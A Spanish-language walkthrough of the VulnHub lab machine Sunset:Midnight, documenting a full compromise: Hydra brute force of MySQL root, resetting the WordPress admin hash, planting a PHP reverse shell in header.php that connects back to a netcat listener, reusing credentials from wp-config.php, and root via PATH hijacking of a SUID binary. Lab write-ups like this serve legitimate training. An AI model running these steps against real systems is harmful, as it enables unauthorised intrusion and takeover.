[VULNHUB] Sunset:Midnight

Hoy vamos a hackear la maquina de Vulnhub llamada Sunset:Midnight.Podeis descargarla desde el siguiente enlace: Sunset-Midnight

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A -p- 192.168.1.112                                        ✘ INT 
9s
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-18 10:50 CEST
Nmap scan report for midnight.home (192.168.1.112)
Host is up (0.00040s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:fe:0b:8b:8d:15:e7:72:7e:3c:23:e5:86:55:51:2d (RSA)
|   256 fe:eb:ef:5d:40:e7:06:67:9b:63:67:f8:d9:7e:d3:e2 (ECDSA)
|_  256 35:83:68:2c:33:8b:b4:6c:24:21:20:0d:52:ed:cd:16 (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to http://sunset-midnight/
3306/tcp open  mysql   MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
|   Thread ID: 15
|   Capabilities flags: 63486
|   Some Capabilities: InteractiveClient, LongColumnFlag, Support41Auth, 
ConnectWithDatabase, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, 
SupportsLoadDataLocal, IgnoreSigpipes, SupportsTransactions, 
Speaks41ProtocolNew, ODBCClient, FoundRows, DontAllowDatabaseTableColumn, 
SupportsCompression, SupportsMultipleStatments, SupportsMultipleResults, 
SupportsAuthPlugins
|   Status: Autocommit
|   Salt: WpR'kgE^-c+Jq{9H@DvG
|_  Auth Plugin Name: 104
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.19 seconds
Vemos que tiene el puerto 3306 (mysql) abierto y que podemos interactuar con el, asi que hacemos bruteforce al usuario root en el mysql usando hydra.

~ > hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.112 mysql
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret 
service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-18 
10:51:34
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel 
connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries 
(l:1/p:14344398), ~3586100 tries per task
[DATA] attacking mysql://192.168.1.112:3306/
[3306][mysql] host: 192.168.1.112   login: root   password: robert
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-18 
10:51:43
Encontramos la password! Nos logueamos en el mysql con los credenciales que hemos conseguido.

~ > mysql mysql -h 192.168.1.112 -u root -p
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 206
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [mysql]>
Miramos que BBDD hay.

MariaDB [mysql]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress_db       |
+--------------------+
4 rows in set (0.001 sec)

MariaDB [mysql]> 
Seleccionamos la BBDD "wordpress_db" y miramos las tablas...

MariaDB [mysql]> use wordpress_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress_db]> show tables;
+------------------------+
| Tables_in_wordpress_db |
+------------------------+
| wp_commentmeta         |
| wp_comments            |
| wp_links               |
| wp_options             |
| wp_postmeta            |
| wp_posts               |
| wp_sp_polls            |
| wp_term_relationships  |
| wp_term_taxonomy       |
| wp_termmeta            |
| wp_terms               |
| wp_usermeta            |
| wp_users               |
+------------------------+
13 rows in set (0.001 sec)

MariaDB [wordpress_db]> 
Miramos la tabla "wp_users".

MariaDB [wordpress_db]> select * from wp_users;
+----+------------+------------------------------------+---------------+--------
-------------+------------------------+---------------------+-------------------
--+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | 
user_email          | user_url               | user_registered     | 
user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+--------
-------------+------------------------+---------------------+-------------------
--+-------------+--------------+
|  1 | admin      | $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/ | admin         | 
example@example.com | http://sunset-midnight | 2020-07-16 19:10:47 |            
         |           0 | admin        |
+----+------------+------------------------------------+---------------+--------
-------------+------------------------+---------------------+-------------------
--+-------------+--------------+
1 row in set (0.000 sec)

MariaDB [wordpress_db]> 
Al ser "root", podemos modificar los datos de la tabla. Vamos a modificar la password para poder loguearnos en el wordpress como admin. Para ello generamos una pass:

~ > echo -n "pass123" | md5sum
32250170a0dca92d53ec9624f336ca24  -
Hacemos el update (la password es pass123)

MariaDB [wordpress_db]> update wp_users SET 
user_pass="32250170a0dca92d53ec9624f336ca24" where user_login="admin"
    -> ;
Query OK, 1 row affected (0.010 sec)
Rows matched: 1  Changed: 1  Warnings: 0
Agregamos al /etc/hosts: 192.168.1.112 sunset-midnight Y visitamos: http://sunset-midnight/wp-login.php Ya estamos logueados en el wordpress como admin :) Vamos a agregar una reverse shell, para ello editamos /usr/share/webshells/php/php-reverse-shell.php y ponemos nuestra IP. Una vez modificada, en wordpress vamos a: Aparencia -> Theme Editor y modificamos el header.php, agregando nuestra reverse shell php. Una vez modificado, ponemos nc a la escucha:

~ > nc -nlvp 1234
listening on [any] 1234 ...
Visitamos http://sunset-midnight/ y obtenemos nuestra shell :)

Low Shell



~ > nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.1.59] from (UNKNOWN) [192.168.1.112] 54120
Linux midnight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) 
x86_64 GNU/Linux
 06:01:19 up  1:11,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
Una vez dentro, exploramos el sistema. Al tener un wordpress instalado, miramos el fichero wp-config.php.

www-data@midnight:/$ cd /var/www/html/wordpress
www-data@midnight:/var/www/html/wordpress$ ls
ls
index.php	 wp-blog-header.php    wp-includes	  wp-settings.php
license.txt	 wp-comments-post.php  wp-links-opml.php  wp-signup.php
readme.html	 wp-config.php	       wp-load.php	  wp-trackback.php
wp-activate.php  wp-content	       wp-login.php	  xmlrpc.php
wp-admin	 wp-cron.php	       wp-mail.php
www-data@midnight:/var/www/html/wordpress$ cat wp-config.php
--SNIP--
define( 'DB_NAME', 'wordpress_db' );
define( 'DB_USER', 'jose' );
define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );
define( 'DB_HOST', 'localhost' );
--SNIP--
Vemos que en wp-config.php aparece el usuario "jose" y su respectiva password. Sabemos que hay un usuario llamado jose en el sistema asi que probar a loguearnos con sus credenciales.

www-data@midnight:/home$ su jose
Password: 645dc5a8871d2a4269d4cbe23f6ae103
jose@midnight:/home$ id
uid=1000(jose) gid=1000(jose) 
groups=1000(jose),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1
09(netdev),111(bluetooth)

user.txt


Ya como jose, miramos la flag de user.txt.

jose@midnight:/home$ cd /home/jose
jose@midnight:~$ ls
user.txt
jose@midnight:~$ cat user.txt
956a9564aa5632edca7b745c696f6575
Seguimos mirando que encontramos por el sistema, en este caso continuamos mirando los ficheros SUID.

jose@midnight:~$ find / -perm -4000 2>/dev/null
--SNIP--
/usr/bin/su
/usr/bin/sudo
/usr/bin/status
/usr/lib/openssh/ssh-keysign
--SNIP--
Vemos que hay un fichero "status" que no suele ser habitual, le echamos un vistazo con strings para ver si vemos algo interesante.

Privilege Escalation



jose@midnight:~$ strings /usr/bin/status
--SNIP--
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
service ssh status
--SNIP--
Vemos que el binario, ejecuta "service ssh status" usando un path relativo y no absoluto, con lo cual podemos crear nuestro propio "service", cambiar el $PATH y ejecutar el binario para que se ejecute nuestro "service" con permisos de root. Nuestro "service" sera unicamente un fichero que contenga "/bin/bash" para que no de una shell de root. Lo preparamos!

jose@midnight:~$ echo "/bin/bash" > service
jose@midnight:~$ chmod +x service
jose@midnight:~$ export PATH=.:$PATH
jose@midnight:~$ /usr/bin/status
root@midnight:~# id
uid=0(root) gid=0(root) 
groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(
netdev),111(bluetooth),1000(jose)
Ya tenemos la shell con privilegios!

root.txt



root@midnight:~# cd /root
root@midnight:/root# ls
root.txt  status  status.c
root@midnight:/root# cat root.txt
          ___   ____
        /' --;^/ ,-_\     \ | /
       / / --o\ o-\ \\   --(_)--
      /-/-/|o|-|\-\\|\\   / | \
       '`  ` |-|   `` '
             |-|
             |-|O
             |-(\,__
          ...|-|\--,\_....
      ,;;;;;;;;;;;;;;;;;;;;;;;;,.
~,;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;,  ______   ---------   _____     ------

db2def9d4ddcb83902b884de39d426e6

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

End


Y con esto ya seriamos root de la maquina.